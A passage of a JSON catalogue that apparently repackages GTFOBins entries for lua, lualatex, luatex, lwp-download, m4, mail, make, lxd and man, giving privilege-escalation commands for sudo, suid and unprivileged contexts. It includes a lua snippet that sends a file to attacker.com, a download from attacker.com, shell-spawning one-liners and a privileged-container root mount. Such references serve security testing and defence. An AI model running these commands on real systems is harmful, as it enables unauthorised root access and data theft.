installation","aliases":[]},{"id":"gtfo:lua:upload:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:upload:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lualatex:inherit:0:sudo","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lualatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lualatex:inherit:0:suid","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lualatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lualatex:inherit:0:unprivileged","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lualatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:luatex:inherit:0:sudo","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/luatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:luatex:inherit:0:suid","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/luatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:luatex:inherit:0:unprivileged","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/luatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:download:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lwp-download http://attacker.com/path/to/input-file /path/to/output-file","description":"The destination file `/path/to/output-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:download:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"lwp-download http://attacker.com/path/to/input-file /path/to/output-file","description":"The destination file `/path/to/output-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-read:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lwp-download file:///path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-read:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lwp-download file:///path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-write:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nlwp-download file:///path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-write:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nlwp-download file:///path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-write:1:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lwp-download file:///path/to/input-file /path/to/output-file","description":"This actually copies a file to a destination.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-write:1:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"lwp-download file:///path/to/input-file /path/to/output-file","description":"This actually copies a file to a destination.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-request:file-read:0:sudo","toolId":"gtfo:lwp-request","toolName":"lwp-request","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lwp-request file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-request/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-request:file-read:0:unprivileged","toolId":"gtfo:lwp-request","toolName":"lwp-request","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lwp-request file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-request/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lxd:shell:0:sudo","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc init ubuntu:16.04 x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"The image (e.g., `ubuntu:16.04`) must be present already, otherwise it will be downloaded.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lxd:shell:0:suid","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc init ubuntu:16.04 x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"The image (e.g., `ubuntu:16.04`) must be present already, otherwise it will be downloaded.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lxd:shell:1:sudo","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc image import ./alpine*.tar.gz --alias x\nlxc init x x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"This requires steps to be run offline, then the resulting image must be uploaded to target. Build the local image with [lxd-alpine-builder](https://github.com/saghul/lxd-alpine-builder):\n\n```\ngit clone https://github.com/saghul/lxd-alpine-builder\ncd lxd-alpine-builder\nsudo ./build-alpine -a i686\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lxd:shell:1:suid","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc image import ./alpine*.tar.gz --alias x\nlxc init x x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"This requires steps to be run offline, then the resulting image must be uploaded to target. Build the local image with [lxd-alpine-builder](https://github.com/saghul/lxd-alpine-builder):\n\n```\ngit clone https://github.com/saghul/lxd-alpine-builder\ncd lxd-alpine-builder\nsudo ./build-alpine -a i686\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:command:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:command:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:command:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:file-read:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:file-read:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:file-read:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:shell:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:shell:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:shell:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:0:sudo","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:0:suid","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:0:unprivileged","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:1:sudo","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:1:suid","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:1:unprivileged","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-read:0:sudo","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-read:0:suid","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-read:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-write:0:sudo","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-write:0:suid","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-write:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:shell:0:sudo","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:shell:0:suid","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:shell:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:file-read:0:sudo","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:file-read:0:suid","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:file-read:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:inherit:0:sudo","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:inherit:0:suid","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:inherit:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"inherit ← 